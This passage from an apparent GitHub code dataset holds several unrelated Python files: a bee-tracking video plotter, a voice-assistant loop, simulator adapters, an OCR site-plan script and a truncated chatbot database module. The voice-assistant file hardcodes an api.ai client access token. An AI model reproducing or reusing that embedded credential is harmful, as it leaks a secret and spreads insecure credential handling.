@property\n def xs_unscaled(self):\n return self._xs\n @property\n def ys_unscaled(self):\n return self._ys\n @property\n def angles(self):\n return self._angles\n @property\n def sizes(self):\n return self._sizes\n @property\n def colors(self):\n if type(self._colors) is str or type(self._colors) is tuple:\n N = self.xs.shape[0]\n self._colors = np.array([self._colors] * N).reshape(N, 1)\n elif self._colors is None:\n N = self.xs.shape[0]\n self._colors = np.array([\"yellow\"] * N).reshape(N, 1)\n return self._colors\n @property\n def labels(self):\n return self._labels\n @property\n def title(self):\n return self._title\n @property\n def frame_id(self):\n return self._frame_id\n @property\n def scale(self):\n return self._scale if self._scale else 0.5\n @property\n def crop_coordinates(self):\n if self._crop_coordinates is None:\n return self._crop_coordinates\n return list((np.array(self._crop_coordinates) * self.scale).astype(np.int))\n @property\n def crop_mode(self):\n return self._crop_mode or \"shift\"\n @property\n def width(self):\n return int(config.width * self.scale)\n @property\n def height(self):\n return int(config.height* self.scale)\n @property\n def path_alpha(self):\n return self._path_alpha or 0.25\n @property\n def decode_all_frames(self):\n return not not self._decode_all_frames\n @property\n def decode_n_frames(self):\n return self._decode_n_frames\n @property\n def no_rotate(self):\n return not not self._no_rotate\n\n def requested_file_format(self):\n \"\"\"\n The file format to be returned by ffmpeg.\n \"\"\"\n return \"jpg\" if not self._raw else \"bmp\"\n\n def is_plotting_required(self):\n \"\"\"\n Whether matplotlib has to be used to prepare the image.\n \"\"\"\n return not self._raw\n\n def prepare_plotting(self, frame_obj):\n \"\"\"\n Required to be called prior to plotting. 
Fetches\n certain information from the database so that a forked\n process does not need to access the database objects or\n the connection.\n\n Args:\n frame_obj: models.Frame object\n \"\"\"\n self._timestamp = frame_obj.timestamp\n self._cam_id = frame_obj.cam_id\n\n def calculate_origin(self, frame_obj):\n \n import datetime\n assert self._cam_id >= 0 and self._cam_id <= 3\n year = datetime.datetime.utcfromtimestamp(self._timestamp).year\n return api.get_image_origin(self._cam_id, year)\n\n def plot(self, buffer, frame_obj=None):\n \"\"\"\n\n Args:\n buffer: file-like object containing the image\n\n Returns:\n utils.ReusableBytesIO object containing the final image\n \"\"\"\n if frame_obj is not None:\n self.prepare_plotting(frame_obj)\n else:\n if self._cam_id is None:\n raise ValueError(\"FramePlotter.plot called without frame_obj and without having called prepare_plotting beforehand.\")\n\n outputbuffer = None\n format = self.requested_file_format().upper()\n image = plt.imread(buffer, format=format)\n image = np.swapaxes(image, 0, 1)\n \n # To be able to specify a size independent of the resolution.\n if self.crop_coordinates: # Note that X and Y are swapped.\n x, y, x2, y2 = self.crop_coordinates\n width = abs(y2 - y)\n height = abs(x2 - x)\n else:\n width = image.shape[1]\n height = image.shape[0]\n width_factor = 1.0 / (width / config.height)\n\n is_plotting_required = self.is_plotting_required()\n\n if is_plotting_required:\n fig, ax = plt.subplots()\n dpi = fig.get_dpi()\n fig.set_size_inches(width/dpi, height/dpi)\n fig.subplots_adjust(left=0, right=1, bottom=0, top=1) # removes white margin\n \n ax.imshow(image)\n ax.axis('off')\n else:\n image = image[:, :, 0]\n \n # The actual plotting.\n if is_plotting_required:\n if self.xs is not None and self.ys is not None:\n # Draw arrows if rotation is given.\n if self.angles is not None:\n rotations = np.array([rotate_direction_vec(rot, self.scale) for rot in self.angles]) * 10.0\n ax.quiver(self.ys, self.xs, rotations[:, 1], rotations[:, 0], scale=0.45 / self.scale, color=self.colors, units='xy', alpha=0.5)\n \n for unique_color in np.unique(self.colors, axis=0):\n idx = np.all(self.colors == unique_color, axis=1).flatten()\n if unique_color.shape[0] == 1:\n unique_color = unique_color[0]\n # Draw scatterplot if radius is given.\n if self.sizes is not None:\n radius = np.array(self.sizes)\n # The size is meant to be in pixels of the original video.\n # A radius of around 25 pixels would be a tag.\n size = 2.0 * float(radius[idx][0])\n # Calcluate area, adjusted for scaling factor.\n size = (size * self.scale) ** 2.0\n ax.scatter(self.ys[idx], self.xs[idx], facecolors='none', edgecolors=unique_color, marker=\"o\",\n s=size, linewidth=max(3, 6 * self.scale * width / config.width) * self.scale, alpha=0.5)\n # Draw marker labels if given.\n if self.labels is not None:\n for i, label_i in enumerate(self.labels[idx]):\n if label_i is None or not label_i:\n continue\n ax.text(self.ys[idx][i], self.xs[idx][i], label_i, color=unique_color, fontsize=int(72 / width_factor), alpha=0.5)\n if self._paths is not None:\n for label, (distance, path) in self._paths.items():\n path = np.array(path) * self.scale\n color = \"k\"\n try:\n label_idx = np.argwhere(self.labels == label)[0][0]\n color = self.colors[label_idx]\n except:\n pass\n # Plot the path in segments to allow fading alpha.\n # Use bigger steps for better performance.\n last_end = path.shape[0]\n stepsize = 10 if last_end > 20 else 4\n steps = list(reversed(range(0, last_end, 
stepsize)))\n alpha = 1.0 - 0.1 * np.arange(len(steps))\n alpha[alpha < 0.1] = 0.1\n alpha *= self.path_alpha\n \n for step_i, step in enumerate(steps):\n ax.plot(path[step:last_end,1], path[step:last_end,0], color=color, linewidth=max(3, 10 * width / config.width) * self.scale, alpha=alpha[step_i])\n last_end = step + 1\n if self.title is not None:\n txt = plt.text(0.1, 0.9, self.title, size=int(108 / width_factor), color='white', transform=ax.transAxes, horizontalalignment='left')\n txt.set_path_effects([matplotlib.patheffects.withStroke(linewidth=5, foreground='k')])\n else:\n # No fancy plotting required - RAW mode.\n # We still provide basic circle functionality.\n if self.xs is not None and self.ys is not None:\n image.setflags(write=1)\n for (_x, _y, _r, _c) in zip (self.xs, self.ys, self.sizes, self.colors):\n rr, cc = skimage.draw.circle(_x, _y, self.scale * _r, shape=image.shape)\n color = matplotlib.colors.to_rgba(_c)\n # Assume the provided color is some sort of gray.\n image[rr, cc] = color[0] * 255\n if self.crop_coordinates is not None:\n x, y, x2, y2 = self.crop_coordinates\n # Make sure the width/height is divisible by two.\n # This is required by some codecs.\n if (x2 - x) % 2 == 1:\n x2 += 1\n if (y2 - y) % 2 == 1:\n y2 += 1\n w, h = x2 - x, y2 - y\n # Make sure the window stops at the screen border.\n keep_image_sizes = self.crop_mode == \"shift\"\n if x < 0:\n if keep_image_sizes:\n x2 -= x - 0\n x = 0\n if x2 > image.shape[0] - 1:\n if keep_image_sizes:\n x -= x2 - (image.shape[0] - 1)\n x2 = image.shape[0] - 1\n if y < 0:\n if keep_image_sizes:\n y2 -= y - 0\n y = 0\n if y2 > image.shape[1] - 1:\n if keep_image_sizes:\n y -= y2 - (image.shape[1] - 1)\n y2 = image.shape[1] - 1\n if is_plotting_required:\n ax.set_xlim((y, y2))\n ax.set_ylim((x, x2))\n else:\n image = image[x:x2, y:y2]\n if keep_image_sizes:\n assert (x2 - x) == w\n assert (y2 - y) == h\n elif is_plotting_required:\n # Make sure that the plot is cropped at the image's bounds.\n ax.set_xlim((0, image.shape[1]))\n ax.set_ylim((0, image.shape[0]))\n # Make sure that the image's origin is the same as in the original video.\n if not self.no_rotate:\n origin = self.calculate_origin(frame_obj)\n if is_plotting_required:\n api.transform_axis_coordinates(origin=origin)\n else:\n if origin[0] == 1:\n image = image[:, ::-1]\n if origin[1] != 0:\n image = image[::-1, :]\n else:\n # Swap the image back so that it's in the original x/y space.\n # It's done here again instead of not doing it in the beginning to\n # unify all coordinate actions for both cases.\n if not is_plotting_required:\n image = np.swapaxes(image, 1, 0)\n else:\n # The axes of the plot would need to be swapped.\n # Todo if combination of raw=False and no_rotate=True is required.\n pass\n\n outputbuffer = utils.ReusableBytesIO()\n if is_plotting_required:\n fig.savefig(outputbuffer, dpi=dpi, format='JPG')\n plt.close()\n else:\n np.save(outputbuffer, image, allow_pickle=False)\n outputbuffer.seek(0)\n\n return outputbuffer\n\n\nclass VideoPlotter(api.VideoPlotter):\n \n def __init__(self, **args):\n super(VideoPlotter, self).__init__(**args)\n\n # 'frames' can be a list of dictionaries, too.\n if len(self._frames) > 0 and isinstance(self._frames[0], dict):\n self._frames = [FramePlotter.from_dict(frame) for frame in self._frames]\n\n # First, fill in missing frames if requested.\n if self._fill_gaps:\n from .models import Frame\n\n fids = [frame.frame_id for frame in self._frames]\n i = 0\n while i < len(fids) - 1:\n fid1, fid2 = fids[i], 
fids[i+1]\n f1 = Frame.objects.get(frame_id=fid1)\n f2 = Frame.objects.get(frame_id=fid2)\n if f1.fc_id != f2.fc_id:\n i += 1\n continue\n if f2.index - f1.index == 1:\n i += 1\n continue\n fill_frame_ids = (\n Frame.objects.filter(\n fc_id=f1.fc_id,\n index__gt=f1.index,\n index__lt=f2.index\n ).order_by('index').values_list('frame_id', flat=True)\n )\n for fill_frame_id in reversed(fill_frame_ids): # reversed so we dont need to increment i\n fill_frame_id = int(fill_frame_id)\n fids.insert(i+1, fill_frame_id)\n # Fill data with copy of previous frame.\n filler_frame = copy.deepcopy(self._frames[i])\n filler_frame._frame_id = fill_frame_id\n self._frames.insert(i+1, filler_frame)\n i += 1 + len(fill_frame_ids)\n \n # Add frames before and after the specified frames.\n if self._n_frames_before_after:\n from .models import Frame\n for idx, offset in ((0, -self._n_frames_before_after-1), (-1, +self._n_frames_before_after+1)):\n frame_plotter = self._frames[idx]\n fid = frame_plotter.frame_id\n frame = Frame.objects.get(frame_id=fid)\n from_idx, to_idx = frame.index + offset, frame.index\n if offset > 0:\n from_idx, to_idx = to_idx, from_idx\n fill_frame_ids = (\n Frame.objects.filter(\n fc_id=frame.fc_id,\n index__gt=from_idx,\n index__lt=to_idx\n ).order_by('index').values_list('frame_id', flat=True)\n )\n if idx == 0:\n fill_frame_ids = reversed(fill_frame_ids)\n for fill_frame_id in fill_frame_ids:\n filler_frame = copy.deepcopy(frame_plotter)\n filler_frame._frame_id = fill_frame_id\n filler_frame._xs = None\n filler_frame._ys = None\n filler_frame._title = None\n self._frames.insert(idx, filler_frame)\n\n # Calculate auto-cropping.\n if self._crop_margin is not None:\n xs = np.array([x for frame in self._frames if frame._xs is not None for x in frame._xs])\n ys = np.array([y for frame in self._frames if frame._ys is not None for y in frame._ys])\n \n if len(xs) > 0 and len(ys) > 0:\n self._crop_coordinates = adjust_cropping_window(xs, ys,\n scale=1.0, padding=self._crop_margin)\n\n # Calculate tracks based on the labels.\n if self._track_labels:\n # First pass, figure out positions of labels per frame.\n for frame_idx, frame in enumerate(self._frames):\n if frame.labels is None:\n continue\n if not frame._paths:\n frame._paths = {}\n # For every label in the current frame, find the closest matching\n # label in the next frames.\n for label_idx, label in enumerate(frame.labels):\n candidates = []\n label_x, label_y = frame.xs_unscaled[label_idx], frame.ys_unscaled[label_idx]\n # Need to start a new path?\n current_path = (math.inf, [[label_x, label_y]])\n if label in frame._paths:\n current_path = frame._paths[label]\n \n for next_frame_idx in range(frame_idx + 1, len(self._frames)):\n next_frame = self._frames[next_frame_idx]\n if next_frame.labels is None:\n continue\n frame_distance = next_frame_idx - frame_idx\n\n # Figure out index of label(-candidates) in next frame.\n for other_label_idx, other_label in enumerate(next_frame.labels):\n if other_label == label:\n x, y = next_frame.xs_unscaled[other_label_idx], next_frame.ys_unscaled[other_label_idx]\n distance = math.sqrt((label_x - x) ** 2.0 + (label_y - y) ** 2.0)\n # Allow only a sensible distance to prevent lines from jumping.\n # Per-frame movement limit.\n if distance > (frame_distance * 75.0):\n continue\n # Total gap length before a new path is started.\n if distance > 300.0:\n continue\n candidates.append((distance, next_frame_idx, (x, y)))\n if candidates:\n break\n if not candidates:\n continue\n # Now remember the line 
for the nearest next label.\n distance, next_frame_idx, (x, y) = sorted(candidates)[0]\n # And interpolate all frames in between.\n interpolation_per_frame = 1.0 / float(next_frame_idx - frame_idx)\n for f, interpolation_frame_idx in enumerate(range(frame_idx + 1, next_frame_idx + 1)):\n next_frame = self._frames[interpolation_frame_idx]\n interpolation = (f + 1) * interpolation_per_frame\n _x = label_x + (x - label_x) * interpolation\n _y = label_y + (y - label_y) * interpolation\n\n if not next_frame._paths:\n next_frame._paths = {}\n # Check if better path was found.\n if label in next_frame._paths:\n if distance >= next_frame._paths[label][0]:\n break\n new_path = (distance, current_path[1] + [[_x, _y]])\n next_frame._paths[label] = new_path\n current_path = new_path\n\n # Some options can be set for all frames through the video options.\n for property in (\"_crop_coordinates\", \"_scale\", \"_path_alpha\"):\n value = getattr(self, property)\n if value is not None:\n for frame in self._frames:\n if getattr(frame, property) is None:\n setattr(frame, property, value)\n\n # If a title prefix is specified, update the frames.\n if self._title and len(self._frames) > 0:\n import datetime\n prefix = self._title\n \n if prefix == \"auto\":\n # Figure out the cam ID - assume that all frames come from the same cam.\n frame = Frame.objects.get(frame_id=self._frames[0].frame_id)\n cam_id = frame.cam_id\n # The actual frame ID and datetime will be added later.\n prefix = \"{frame_idx:4d} {datetime:}\"\n # Only the cam is fixed for all frames.\n prefix += f\" cam {cam_id:2d}\"\n # Whether we need to query additional metadata for the titles.\n needs_frame_info = (\"{datetime\" in prefix)\n\n for frame_idx, frame in enumerate(self._frames):\n # Fill placeholders.\n format_args = {}\n if \"{frame_idx\" in prefix:\n format_args[\"frame_idx\"] = frame_idx\n if needs_frame_info:\n db_frame = Frame.objects.get(frame_id=frame.frame_id)\n if \"{datetime\" in prefix:\n format_args[\"datetime\"] = \\\n datetime.datetime.fromtimestamp(db_frame.timestamp).\\\n strftime('%Y-%m-%d %H:%M:%S.%f')[:-3]\n custom_prefix = prefix\n if format_args:\n custom_prefix = custom_prefix.format(**format_args)\n\n if frame._title:\n frame._title = custom_prefix + \" \" + frame._title\n else:\n frame._title = custom_prefix\n def plot(self):\n \"\"\"\n Creates a video with information of a track\n\n Returns:\n utils.ReusableBytesIO object containing the video.\n \"\"\"\n from .models import Frame\n\n with multiprocessing.Pool(config.n_threads) as pool:\n results = []\n extracted_frames = dict()\n for plotter in self._frames:\n frame = Frame.objects.get(frame_id=plotter.frame_id)\n\n if frame.frame_id not in extracted_frames:\n extracted_frames = {**extracted_frames, **extract_frames(frame.fc, plotter.scale)}\n assert(frame.frame_id in extracted_frames)\n # Prepare non-fork-safe things.\n plotter.prepare_plotting(frame)\n\n r = pool.apply_async(\n plotter.plot,\n (extracted_frames[frame.frame_id],)\n )\n results.append(r)\n\n images = [r.get() for r in results] # wait for all\n\n with tempfile.TemporaryDirectory() as tmpdir:\n # Write buffer to disk for ffmpeg to work.\n for idx, buffer in enumerate(images):\n with open(os.path.join(tmpdir, f'{idx:04d}.jpg'), \"wb\") as file:\n shutil.copyfileobj(buffer, file)\n \n input_path = os.path.join(tmpdir, '%04d.jpg')\n video_output_path = os.path.join(tmpdir, 'video.mp4')\n framerate = self._framerate or 3\n cmd = config.ffmpeg_frames_to_video.format(input_path=input_path, 
output_path=video_output_path, framerate=framerate)\n print('executing: ', cmd)\n try:\n output = check_output(cmd, shell=True)\n except Exception as e:\n # What went wrong? Check image files.\n sizes = set()\n for idx in range(len(images)):\n im = Image.open(os.path.join(tmpdir, f'{idx:04d}.jpg'))\n sizes.add(im.size)\n if len(sizes) > 1:\n print(\"Warning! Mismatching image sizes: {}\".format(str(sizes)))\n else:\n print(\"Image size: {}\".format(str(sizes)))\n raise\n print('Output:', output)\n\n with open(video_output_path, \"rb\") as file:\n buf = utils.ReusableBytesIO(file.read())\n buf.seek(0)\n return buf\n","repo_name":"BioroboticsLab/beesbook_backend","sub_path":"plotter/media.py","file_name":"media.py","file_ext":"py","file_size_in_byte":31358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"23410270035","text":"import sys\r\nfrom os.path import join, dirname\r\nfrom transcribe_streaming_mic import speech2Text\r\nimport pyaudio\r\nimport time\r\nimport json \r\nimport os.path\r\nimport logging\r\n\r\nTOP_DIR = os.path.join(os.path.join(os.path.dirname(os.path.realpath(__file__)), os.pardir), os.pardir)\r\nUTILS_DIR = os.path.join(os.path.dirname(os.path.realpath(__file__)), os.pardir)\r\ntry:\r\n import apiai\r\nexcept ImportError:\r\n sys.path.append(os.path.join(os.path.dirname(os.path.realpath(__file__)), os.pardir))\r\n import apiai\r\n\r\ntry:\r\n sys.path.insert(0, os.path.join(TOP_DIR, \"utils/logger\"))\r\n import logger as log\r\nexcept ImportError:\r\n exit()\r\n\r\ntry:\r\n sys.path.insert(0, os.path.join(TOP_DIR, \"snowboy/examples/Python3\"))\r\n import snowboydecoder as sb\r\nexcept ImportError:\r\n exit()\r\n\r\ntry:\r\n sys.path.insert(0, os.path.join(TOP_DIR, \"utils/JSON\"))\r\n import json_utils\r\nexcept ImportError:\r\n exit()\r\n\r\nstate = \"Sleep\"\r\nmodel = os.path.join(TOP_DIR, \"models/Hyper.pmdl\")\r\ndetector = sb.HotwordDetector(model, sensitivity=0.5)\r\ninterrupted = False\r\nCLIENT_ACCESS_TOKEN = '587dba5ac7de45b3a05b7901a04f5b2e'\r\n\r\n# Hot word detection callback (which will be run whenever the user says the hot word)\r\ndef hotWordCallback():\r\n sb.play_audio_file()\r\n detector.terminate()\r\n time.sleep(0.3)\r\n global state\r\n state = \"Run\"\r\n\r\n# interrupt the hotword process loop\r\ndef signal_handler():\r\n global interrupted\r\n interrupted = True\r\n\r\n# callback to check for interrupt\r\ndef interrupt_callback():\r\n global interrupted\r\n return interrupted\r\n\r\n# hot word detection: main function\r\ndef hotWordDetect(modelPath=model):\r\n # capture SIGINT signal, e.g., Ctrl+C\r\n # signal.signal(signal.SIGINT, signal_handler)\r\n \r\n print('Listening... 
Press Ctrl+C to exit')\r\n    # main loop\r\n    detector.start(detected_callback=hotWordCallback,\r\n                   interrupt_check=interrupt_callback,\r\n                   sleep_time=0.03)\r\n\r\n# apiai for Natural language understanding\r\ndef apiaiPGetResponse(transcript):\r\n    ai = apiai.ApiAI(CLIENT_ACCESS_TOKEN)\r\n\r\n    request = ai.text_request()\r\n    request.lang = 'en' # optional, default value equals 'en'\r\n    request.session_id = \"vulong\"\r\n    request.query = transcript\r\n    response = request.getresponse()\r\n\r\n    return response.read()\r\n\r\n# covers 2 processes: call speech to text and call the NLU module\r\ndef voice2JSON():\r\n    # Use Google API stream mic:\r\n    transcript = speech2Text()\r\n    apiaiResponse = apiaiPGetResponse(transcript)\r\n    # print(apiaiResponse.decode('utf-8'))\r\n    apiaiResponse = json.loads(apiaiResponse.decode('utf-8'))\r\n    if apiaiResponse[\"result\"]:\r\n        parsedAction = apiaiResponse[\"result\"][\"action\"]\r\n        parsedActionIncomplete = apiaiResponse[\"result\"][\"actionIncomplete\"]\r\n        parsedScore = apiaiResponse[\"result\"][\"score\"]\r\n        parsedParameters = apiaiResponse[\"result\"][\"parameters\"]\r\n        parsedSpeechScript = apiaiResponse[\"result\"][\"fulfillment\"][\"speech\"]\r\n        parsedSpeechScript2 = apiaiResponse[\"result\"][\"fulfillment\"][\"messages\"][0][\"speech\"]\r\n        return parsedAction, parsedActionIncomplete, parsedScore, parsedParameters, parsedSpeechScript, parsedSpeechScript2\r\n    else:\r\n        print(\"Null api results\")\r\n        return -1, -1, -1, -1, -1, -1\r\n\r\n\r\ndef voiceProcess(log_q, mng_q, aud_q):\r\n    logger = log.loggerInit(log_q)\r\n    logger.log(logging.INFO, \"voiceProcess is started\")\r\n    while True:\r\n        global state\r\n        if state == \"Sleep\":\r\n            state = \"Pause\"\r\n            hotWordDetect()\r\n        elif state == \"Run\":\r\n            logger.log(logging.INFO, \"Voice is detected\")\r\n            [action, actionIncomplete, score, parameters, speechScript, speechScript2] = voice2JSON()\r\n            logger.log(logging.INFO, \"Action: \" + action)\r\n            logger.log(logging.DEBUG, \"actionIncomplete: \" + str(actionIncomplete))\r\n            logger.log(logging.DEBUG, \"score: \" + str(score))\r\n            logger.log(logging.DEBUG, \"parameters: \" + str(parameters))\r\n            logger.log(logging.DEBUG, \"speechScript: \" + speechScript)\r\n            logger.log(logging.DEBUG, \"speechScript2: \" + speechScript2)\r\n            if (action == -1 or action == \"smalltalk.greetings.bye\"):\r\n                aud_q.put(json_utils.jsonSimpleGenerate(\"speech\", speechScript))\r\n                state = \"Sleep\"\r\n                continue\r\n            if (score < 0.5 or actionIncomplete or not(speechScript)):\r\n                try:\r\n                    aud_q.put_nowait(json_utils.jsonSimpleGenerate(\"speech\", \"I am not sure I understand what you mean. 
Can you repeat or explain more?\"))\r\n # mng_q.put_nowait(jsonSimpleGenerate(\"action\", action))\r\n continue\r\n except Exception as e:\r\n logger.log(logging.WARNING, \"Action is not complete or score is low\")\r\n state = \"Sleep\"\r\n continue\r\n else:\r\n try:\r\n # ManagerJSONQueue.put(jsonSimpleGenerate(\"action\", action))\r\n if not aud_q.full():\r\n if (speechScript and speechScript != -1):\r\n logger.log(logging.DEBUG, \"Put script to AudioQueue\")\r\n aud_q.put_nowait(json_utils.jsonSimpleGenerate(\"speech\", speechScript))\r\n if (speechScript2 and speechScript2 != -1 and speechScript != speechScript2):\r\n time.sleep(1)\r\n logger.log(logging.DEBUG, \"Put script to AudioQueue\")\r\n aud_q.put_nowait(json_utils.jsonSimpleGenerate(\"speech\", speechScript2))\r\n else:\r\n logger.log(logging.WARNING, \"Audio queue is full\")\r\n state = \"Sleep\"\r\n continue \r\n except Exception as e:\r\n logger.log(logging.WARNING, str(type(e)))\r\n state = \"Sleep\"\r\n continue\r\n elif state == \"Pause\":\r\n time.sleep(1)\r\n","repo_name":"lovung/HyperNode-VoiceCommander","sub_path":"utils/audio/microphone.py","file_name":"microphone.py","file_ext":"py","file_size_in_byte":6117,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"34684000854","text":"from smarts_imitation.utils import common\nimport gym\n\n\ndef get_observation_adapter(feature_list, closest_neighbor_num):\n img_resolution = 40\n observe_lane_num = 3\n\n observation_space = gym.spaces.Dict(\n common.subscribe_features(\n feature_list, closest_neighbor_num=closest_neighbor_num\n )\n )\n\n observation_adapter = common.get_observation_adapter(\n observation_space,\n observe_lane_num=observe_lane_num,\n resize=(img_resolution, img_resolution),\n closest_neighbor_num=closest_neighbor_num,\n )\n\n return observation_adapter\n\n\ndef get_action_adapter():\n def action_adapter(model_action):\n assert len(model_action) == 2\n return (model_action[0], model_action[1])\n\n return action_adapter\n","repo_name":"zbzhu99/NGSIM_Imitation","sub_path":"smarts-imitation/smarts_imitation/utils/adapter.py","file_name":"adapter.py","file_ext":"py","file_size_in_byte":778,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"61"} +{"seq_id":"12213099242","text":"# -*- coding: utf-8 -*-\nimport os\nimport re\nimport shutil\nimport statistics\nfrom statistics import mode\n\nfrom pdf2image import convert_from_path\nimport xlwt\nfrom xlwt import Workbook\nimport yolo\nimport pytesseract\nimport cv2\n\ntextBlocks = []\ndictImages = {}\npytesseract.pytesseract.tesseract_cmd = 'C:\\\\Program Files\\\\Tesseract-OCR\\\\tesseract.exe'\n\nroi = [(0, 0), (2500, 854)]\n\n\ndef findBlockAndLot(path):\n image = cv2.imread(path)\n x, y = roi[0]\n w, h = roi[1]\n cv2.rectangle(image, (x, y), (x + w, y + h), (0, 255, 0), 9)\n imageCrop = image[x:x + h, y:y + w]\n\n tesData = f\"{pytesseract.image_to_string(imageCrop)}\"\n lot = ''\n block = ''\n\n if (tesData.__contains__(\"BLOCK\")):\n findBlocks = re.split('BLOCK', tesData)\n splitData = re.split(',| |\\n', findBlocks[1])\n if (splitData[0] == ''):\n block = splitData[1]\n else:\n block = splitData[0]\n else:\n tesData1 = f\"{pytesseract.image_to_string(image)}\"\n\n if (tesData1.__contains__(\"BLOCK\")):\n findBlocks = re.split('BLOCK', tesData1)\n\n bno = []\n\n for i in range(1, len(findBlocks)):\n splitData = re.split(',| |\\n', findBlocks[i])\n if (splitData[0] == ''):\n lot = splitData[1]\n else:\n lot = 
splitData[0]\n bno.append(lot)\n\n block = mode(bno)\n\n if (tesData.__contains__(\"LOT\")):\n\n pos = -1\n if (tesData.__contains__(\"LOTS\")):\n findBlocks = re.split('LOTS', tesData)\n else:\n findBlocks = re.split('LOT', tesData)\n\n splitData = re.split(',| |\\n', findBlocks[1])\n\n if (splitData[0] == ''):\n lot = splitData[1]\n else:\n lot = splitData[0]\n\n # lot = lot.replace(\"I\", \"1\")\n # lot = lot.replace(\"!\", \"1\")\n # lot = lot.replace(\"S\", \"5\")\n\n if lot == '' or lot[0].isdigit() == False:\n print(\"lot not found, trying yolo\")\n lots = yolo.fetchLotFromYolo(path)\n if (len(lots) > 1):\n lot = lots[0] + \"-\" + lots[-1]\n else:\n lot = lots[0]\n\n else:\n print(\"lot not found, trying yolo\")\n lots = yolo.fetchLotFromYolo(path)\n if (len(lots) > 1):\n lot = lots[0] + \"-\" + lots[-1]\n else:\n lot = lots[0]\n\n disallowed_characters = \"._!\"\n for character in disallowed_characters:\n lot = lot.replace(character, \"\")\n block = block.replace(character, \"\")\n\n lot = lot.replace(\"I\", \"1\")\n lot = lot.replace(\"!\", \"1\")\n lot = lot.replace(\"S\", \"5\")\n block = block.replace(\"I\", \"1\")\n block = block.replace(\"!\", \"1\")\n block = block.replace(\"S\", \"5\")\n\n lotFound = False\n blockFound = False\n if lot != \"\":\n lotFound = True\n if block != \"\":\n blockFound = True\n\n json = {\"lot\": lot, \"lotFound\": lotFound, \"block\": block, \"blockFound\": blockFound, }\n print(json)\n return json\n\n\n\n\n\n\n\ndirectory = os.listdir(\"Pdf2Img\")\nwb = Workbook()\nsheet1 = wb.add_sheet('Sheet 1')\nfor i in range(len(directory)):\n f = os.path.join(\"Pdf2Img/\", directory[i])\n if os.path.isfile(f):\n print(f,i)\n resjson = findBlockAndLot(f)\n\n sheet1.write(i, 0, f)\n sheet1.write(i, 1, str(resjson))\n\n wb.save('abc.xls')\n\n\n# findBlockAndLot(directory)\n\n\n\n# def pdf2img(pdfpath):\n# print(pdfpath)\n# pages = convert_from_path(pdfpath, 800, poppler_path=r\"C:\\Users\\VRA\\Downloads\\poppler-0.68.0\\bin\", size=7680)\n# save_path = r'SitePlanImages'\n# if os.path.exists(save_path):\n# shutil.rmtree(save_path)\n# os.mkdir(save_path)\n# for i in range(len(pages)):\n# pages[i].save(save_path + '\\\\' + str(i) + '.jpg', 'JPEG')\n# resjson = findBlockAndLot(save_path + '\\\\' + str(i) + '.jpg')\n#\n# wb = Workbook()\n# sheet1 = wb.add_sheet('Sheet 1')\n#\n# sheet1.write(i, 0, pdfpath.split(\"/\")[-1])\n# sheet1.write(0, i, resjson)\n#\n# wb.save('xlwt example.xls')\n#\n#\n# pdfPath = \"Abbott Square Individual Site Plans/245282000912 5860 Newberry Pines Avenue Site Plan.pdf\"\n# pdf2img(pdfPath)\n","repo_name":"BhuvanaVra/SitePlan-Developments","sub_path":"sitePlan.py","file_name":"sitePlan.py","file_ext":"py","file_size_in_byte":4212,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33484249965","text":"# Chatbot Backend\n\nimport os\nimport threading\nfrom copy import deepcopy\nfrom decimal import Decimal\nfrom datetime import datetime\n\nfrom cbsv import read_json, dump_to_json, check_file_exists, CHINA_CITIES\nfrom cb_sql import MSSQL_readwriter\n\n\ndbfolder = \"userdata\"\nSUPER_DEBUG = 0\nDEBUG = 0\nREAD_FROM_JSON = 1\nWRITE_TO_JSON = 1\n\nclass DatabaseRunner():\n def __init__(self):\n self.backup_delay = 30\n self.timer_on = False\n \n if READ_FROM_JSON:\n self.database = self._read_json_db()\n else:\n self.database = {}\n\n self.SQLrw = MSSQL_readwriter()\n\n def _read_json_db(self):\n def _create_json_db():\n if not check_file_exists(self.dbfilepath):\n print(\"Creating 
empty database file\")\n                dump_to_json(self.dbfilepath,{}, OVERRIDE = 1) # Create an empty file\n            return\n\n        base_directory = os.getcwd()\n        dbfilename = \"database.json\"\n        # self.dbfilepath = os.path.join(base_directory,dbfolder,dbfilename)\n        self.dbfilepath = os.path.join(base_directory,dbfilename) # For testing purposes\n        _create_json_db()\n\n        if DEBUG: print(\"Loading info from\", self.dbfilepath)\n        return read_json(self.dbfilepath)\n\n    # Assuming there is a match\n    def repackage_sql_fetched(self, dbf, status):\n        # Database dates are datetimes. Incompatible with Json.\n        def datetime_obj_to_str(dateobj):\n            if isinstance(dateobj, datetime):\n                return str(dateobj)\n            return dateobj\n\n        # Database values are Decimals. Incompatible with Json.\n        def decimal_obj_to_float(dobj):\n            if isinstance(dobj, Decimal):\n                return float(dobj)\n            return dobj\n\n        def convert_object_to_values(obj):\n            if isinstance(obj, dict):\n                return convert_dict_values(obj)\n            if isinstance(obj, list):\n                return obj\n            obj = decimal_obj_to_float(obj)\n            obj = datetime_obj_to_str(obj)\n            return obj\n\n        def convert_dict_values(raw_d):\n            pro_d = {}\n            for k, v in raw_d.items():\n                pro_d[k] = convert_object_to_values(v)\n            return pro_d\n\n        # Removes the ones with bad cust city\n        def filter_inpure_exist_entries(d):\n            basic_dict = d.get(\"basic\")\n\n            out = {}\n            except_flag = False\n            exceptional_k = \"exceptional_case\"\n            secondary_k = \"secondary_shebao\"\n            deciding_key = \"cust_city\"\n            # Because cust_city is filled with other junk and we are only interested in real cities\n            valid_vals = CHINA_CITIES() \n            \n            extra_count = 0\n            basic_dict_list = list(basic_dict.values())\n            for ed_entry in basic_dict_list:\n                deciding_entry_val = ed_entry.get(deciding_key,\"\")\n                for v in valid_vals:\n                    if v in deciding_entry_val:\n                        print(\"<FILTER> basic dict entry: \", ed_entry, \"DV:\",deciding_entry_val)\n                        if out == {}:\n                            out.update(ed_entry)\n                            break\n                        else:\n                            extra_count += 1\n                            extra_k = secondary_k + str(extra_count)\n                            out[extra_k] = ed_entry\n                            except_flag = True\n                            break\n            \n            out[exceptional_k] = \"yes\" if except_flag else \"no\"\n\n            return out\n        def billing_to_list(d):\n            def _repackage(bd):\n                outlist = [] \n                bd_itemlist = list(bd.items())\n                for realname, details in bd_itemlist:\n                    ramt_due = details.get(\"curr_month_amt_due\",\"\")\n                    amt_due = 